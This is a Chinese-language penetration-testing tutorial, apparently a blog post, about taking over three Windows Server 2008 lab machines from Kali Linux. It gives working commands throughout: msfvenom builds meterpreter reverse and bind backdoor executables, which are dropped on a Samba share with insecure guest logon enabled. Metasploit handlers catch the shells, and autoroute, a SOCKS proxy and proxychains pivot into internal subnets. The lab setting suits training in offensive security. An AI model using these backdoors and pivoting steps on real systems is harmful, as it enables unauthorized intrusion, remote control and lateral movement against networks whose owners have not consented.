赞
踩
目录
准备kali linux虚拟机*1
IP设置
vim /etc/network/interfaces
准备windows2008 R2虚拟机*3
主机1:
其他主机同理。
本次虚拟机环境没有防火墙限制,所以要提前关闭虚拟机的防火墙
1)创建共享目录
mkdir /home/share
2) kali中开启文件共享需要下载samba
apt install samba
3)修改samba配置文件
- vi /etc/samba/smb.conf
-
-
- 文件末尾添加如下内容
- [share] #任意名字
- comment = lv share #任意名字
- path = /home/share # 共享目录
- ;read only = no # 将共享目录设置为只读【前面加了;,表示这行被注释掉了】
- writable = yes # 将共享目录设置为读写
- browseable = yes # 显示共享目录下的所有文件
- public = yes # 将共享目录设置为公共的
- create mask = 0644 # 设置共享目录中的一般文件的默认权限
- directory mask = 0755 # 设置共享目录中的目录文件的默认权限
4)启动samba
- systemctl enable smb
- systemctl enable nmb
- systemctl restart smb
- systemctl restart nmb
5)查看是否启动成功【active(running)代表启动成功】
- systemctl status smb
- systemctl status nmb
注 :windows10/11 如果不是专业版或企业版可能无法访问共享目录
注:win10/11有可能没有打开服务,导致无法访问共享
1)启动组策略
win+r运行输入以下内容
gpedit.msc
2)启用来宾登录
计算机配置==》管理模块==》网络==》Lanman工作站==》启用不安全的来宾登录
1)生成后门文件
reverse_tcp:反向链接时使用
lhost:kali 主机ip
- msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.100.108 lport=1111 -f exe >
- /home/share/1111.exe
2)生成监听器
- msfconsole
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost 0.0.0.0
- set lport 1111
- run
3)被攻击主机1运行生成的1111.exe文件
出现meterpreter就证明成功了,可以执行命令验证
ipconfig
这样我们就实现了第一个主机上线的过程了。
1)实现主机1上线
2)在已经上线的主机1上创建代理转发功能
a).查看路由
run autoroute -p
显示 No routes have been added yet 说明没有路由
b).添加路由
run post/multi/manage/autoroute
出现这样的页面就说明添加路由成功了
3)挂起当前会话
background
4)开启代理功能
- use auxiliary/server/socks_proxy
- set srvhost 0.0.0.0
- set srvport 1122
- run
5)测试代理功能是否可以工作
kali安装proxychains4
apt install proxychains4
修改配置文件
vim /etc/proxychains4.conf
修改之前设置好的端口1122
6)在主机2上安装IIS
7)使用proxychains4测试访问主机2上的IIS
proxychains4 nmap -Pn -sT -p80 10.10.10.2
STATE:open 说明可以访问IIS
8)生成exe文件后门
bind_tcp:正向链接时使用
lhost: 0.0.0.0 指定主机2本机地址
- msfvenom -p windows/meterpreter/bind_tcp lhost=0.0.0.0 lport=2222 -f exe >
- /home/share/2222.exe
9)生成监控器
- background #挂起会话
- use exploit/multi/handler
- set payload windows/meterpreter/bind_tcp
- set rhost 10.10.10.2
- set lport 2222
- run
10)主机2运行2222.exe
1)实现主机1、2上线
2)生成后门
- msfvenom -p windows/meterpreter/bind_tcp lhost=0.0.0.0 lport=3333 -f exe >
- /home/share/3333.exe
3)在主机2会话中创建路由
run post/multi/manage/autoroute
4)挂起会话
background
5)主机3正向链接
- use exploit/multi/handler
- set payload windows/meterpreter/bind_tcp
- set rhost 20.20.20.2
- set lport 3333
- run
这样我们就实现了三台主机上线了。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。